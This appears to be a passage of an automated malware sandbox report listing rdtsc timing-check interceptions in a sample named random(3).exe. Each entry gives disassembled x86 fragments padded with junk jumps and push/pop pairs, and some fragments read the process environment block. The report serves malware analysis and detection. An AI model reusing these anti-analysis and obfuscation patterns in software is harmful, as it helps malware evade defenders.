    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DABBC second address: 16DABC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DABC4 second address: 16DABCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DAD78 second address: 16DAD7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DAD7C second address: 16DAD94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518EA4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DAD94 second address: 16DAD9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DB029 second address: 16DB047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F29FC518E96h 0x0000000a pop ecx 0x0000000b push ecx 0x0000000c jc 00007F29FC518E96h 0x00000012 jng 00007F29FC518E96h 0x00000018 pop ecx 0x00000019 pop edi 0x0000001a push ebx 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DB316 second address: 16DB31A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DB31A second address: 16DB336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F29FC518EA6h 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DE5D8 second address: 16DE5DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DE5DC second address: 16DE5E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DFC69 second address: 16DFC6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DFC6D second address: 16DFC8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518E9Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jg 00007F29FC518E96h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16E196B second address: 16E199A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F29FC4F3696h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jno 00007F29FC4F3698h 0x00000013 jg 00007F29FC4F3698h 0x00000019 jp 00007F29FC4F369Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16E199A second address: 16E199E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16E199E second address: 16E19A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F001B second address: 79F002D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov bh, ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F002D second address: 79F0031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0031 second address: 79F0037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0037 second address: 79F0079 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F369Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d jmp 00007F29FC4F369Eh 0x00000012 mov ch, D6h 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 jmp 00007F29FC4F369Dh 0x0000001c mov eax, dword ptr fs:[00000030h] 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov bx, 628Eh 0x00000029 popad 0x0000002a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0079 second address: 79F00BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518E9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c jmp 00007F29FC518EA6h 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F29FC518EA7h 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F00BB second address: 79F00D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC4F36A4h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F00D3 second address: 79F00D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F00D7 second address: 79F00F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov bx, cx 0x0000000d mov ebx, eax 0x0000000f popad 0x00000010 xchg eax, ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 movsx edi, ax 0x00000017 mov ecx, 4FF6DB3Fh 0x0000001c popad 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F00F4 second address: 79F014F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518EA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [eax+10h] 0x0000000c pushad 0x0000000d push ecx 0x0000000e mov edi, 0A5680BEh 0x00000013 pop edi 0x00000014 jmp 00007F29FC518EA4h 0x00000019 popad 0x0000001a xchg eax, esi 0x0000001b jmp 00007F29FC518EA0h 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F29FC518E9Eh 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F014F second address: 79F0170 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ecx, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F29FC4F36A4h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0170 second address: 79F0182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC518E9Eh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0182 second address: 79F01B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F369Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [772406ECh] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F29FC4F36A5h 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F01B0 second address: 79F0215 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518EA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F29FC518E9Ch 0x00000012 sub si, FB38h 0x00000017 jmp 00007F29FC518E9Bh 0x0000001c popfd 0x0000001d push eax 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007F29FC518EA6h 0x00000025 jmp 00007F29FC518EA5h 0x0000002a popfd 0x0000002b rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0215 second address: 79F0245 instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jne 00007F29FC4F44A9h 0x0000000d pushad 0x0000000e mov ebx, esi 0x00000010 jmp 00007F29FC4F36A4h 0x00000015 popad 0x00000016 xchg eax, edi 0x00000017 pushad 0x00000018 movzx eax, dx 0x0000001b push eax 0x0000001c push edx 0x0000001d mov di, 936Ch 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0245 second address: 79F028E instructions: 0x00000000 rdtsc 0x00000002 call 00007F29FC518EA5h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F29FC518E9Eh 0x00000011 xchg eax, edi 0x00000012 jmp 00007F29FC518EA0h 0x00000017 call dword ptr [77210B60h] 0x0000001d mov eax, 766BE5E0h 0x00000022 ret 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov bl, 70h 0x00000028 push ecx 0x00000029 pop ebx 0x0000002a popad 0x0000002b rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F028E second address: 79F0294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0294 second address: 79F0298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0298 second address: 79F02C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F369Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000044h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F29FC4F36A3h 0x00000015 mov cx, 08AFh 0x00000019 popad 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F02C8 second address: 79F0335 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F29FC518E9Bh 0x00000009 add eax, 6E7F613Eh 0x0000000f jmp 00007F29FC518EA9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F29FC518EA0h 0x0000001b adc ecx, 2A030E38h 0x00000021 jmp 00007F29FC518E9Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a pop edi 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F29FC518EA5h 0x00000032 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0335 second address: 79F0345 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC4F369Ch 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0345 second address: 79F037E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518E9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c jmp 00007F29FC518EA6h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F29FC518E9Eh 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F037E second address: 79F03D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F29FC4F36A1h 0x00000009 add eax, 18DBFA46h 0x0000000f jmp 00007F29FC4F36A1h 0x00000014 popfd 0x00000015 jmp 00007F29FC4F36A0h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, edi 0x0000001e jmp 00007F29FC4F36A0h 0x00000023 push dword ptr [eax] 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a mov dh, B6h 0x0000002c popad 0x0000002d rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F03D9 second address: 79F0407 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518EA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F29FC518E9Dh 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0407 second address: 79F041C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 mov bx, 4C3Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push dword ptr [eax+18h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F041C second address: 79F042A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518E9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0461 second address: 79F04B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a pushad 0x0000000b jmp 00007F29FC4F36A8h 0x00000010 mov cx, 0AD1h 0x00000014 popad 0x00000015 test esi, esi 0x00000017 jmp 00007F29FC4F369Ch 0x0000001c je 00007F2A6BCC28A7h 0x00000022 jmp 00007F29FC4F36A0h 0x00000027 sub eax, eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F04B5 second address: 79F04B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F04B9 second address: 79F04BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F04BD second address: 79F04C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F04C3 second address: 79F0522 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F36A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi], edi 0x0000000b jmp 00007F29FC4F369Eh 0x00000010 mov dword ptr [esi+04h], eax 0x00000013 jmp 00007F29FC4F36A0h 0x00000018 mov dword ptr [esi+08h], eax 0x0000001b pushad 0x0000001c mov cl, 6Dh 0x0000001e jmp 00007F29FC4F36A3h 0x00000023 popad 0x00000024 mov dword ptr [esi+0Ch], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0522 second address: 79F0528 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F067A second address: 79F0703 instructions: 0x00000000 rdtsc 0x00000002 call 00007F29FC4F36A9h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F29FC4F36A7h 0x00000011 sub ax, 3CFEh 0x00000016 jmp 00007F29FC4F36A9h 0x0000001b popfd 0x0000001c mov ah, 55h 0x0000001e popad 0x0000001f popad 0x00000020 mov dword ptr [esi+28h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F29FC4F36A4h 0x0000002c xor cl, 00000028h 0x0000002f jmp 00007F29FC4F369Bh 0x00000034 popfd 0x00000035 mov ax, 301Fh 0x00000039 popad 0x0000003a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0703 second address: 79F0709 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0709 second address: 79F070D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F070D second address: 79F074F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+68h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F29FC518EA9h 0x00000012 and esi, 668DE1F6h 0x00000018 jmp 00007F29FC518EA1h 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 mov cl, C9h 0x00000022 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F074F second address: 79F0802 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F29FC4F36A3h 0x00000008 or eax, 27EBB72Eh 0x0000000e jmp 00007F29FC4F36A9h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov dword ptr [esi+2Ch], eax 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F29FC4F369Ch 0x00000021 and ecx, 350B2CA8h 0x00000027 jmp 00007F29FC4F369Bh 0x0000002c popfd 0x0000002d mov dx, ax 0x00000030 popad 0x00000031 mov ax, word ptr [ebx+6Ch] 0x00000035 jmp 00007F29FC4F36A2h 0x0000003a mov word ptr [esi+30h], ax 0x0000003e jmp 00007F29FC4F36A0h 0x00000043 mov ax, word ptr [ebx+00000088h] 0x0000004a jmp 00007F29FC4F36A0h 0x0000004f mov word ptr [esi+32h], ax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007F29FC4F369Ah 0x0000005c rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0802 second address: 79F0808 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0808 second address: 79F080E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F080E second address: 79F0852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+0000008Ch] 0x0000000e pushad 0x0000000f mov cx, 8C61h 0x00000013 popad 0x00000014 mov dword ptr [esi+34h], eax 0x00000017 jmp 00007F29FC518EA3h 0x0000001c mov eax, dword ptr [ebx+18h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F29FC518EA5h 0x00000026 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0852 second address: 79F0870 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F36A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0870 second address: 79F0874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0874 second address: 79F0887 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F369Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F09B0 second address: 79F09B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F09B6 second address: 79F09BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F09BA second address: 79F09EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518EA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-10h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F29FC518EA7h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F09EC second address: 79F09F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F09F2 second address: 79F09F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F09F6 second address: 79F0A05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0A05 second address: 79F0A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0A09 second address: 79F0A22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F36A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0A22 second address: 79F0A27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0A27 second address: 79F0A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F29FC4F36A1h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0A48 second address: 79F0A4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0A4C second address: 79F0A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0A52 second address: 79F0A69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC518EA3h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0A69 second address: 79F0A6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0A87 second address: 79F0AD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518E9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F29FC518EA8h 0x0000000f xor ecx, 37C8BC28h 0x00000015 jmp 00007F29FC518E9Bh 0x0000001a popfd 0x0000001b popad 0x0000001c test edi, edi 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F29FC518EA0h 0x00000027 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0AD8 second address: 79F0ADC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0ADC second address: 79F0AE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0AE2 second address: 79F0AE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0AE7 second address: 79F0B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 js 00007F2A6BCE7A6Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F29FC518EA2h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0CC3 second address: 79F0CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC4F36A4h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0CDB second address: 79F0D05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518E9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F2A6BCE7863h 0x00000011 pushad 0x00000012 mov esi, 220D086Bh 0x00000017 mov ch, C0h 0x00000019 popad 0x0000001a mov eax, dword ptr [ebp-04h] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 movzx esi, dx 0x00000023 popad 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0D05 second address: 79F0D0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 79F0D0B second address: 79F0D0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
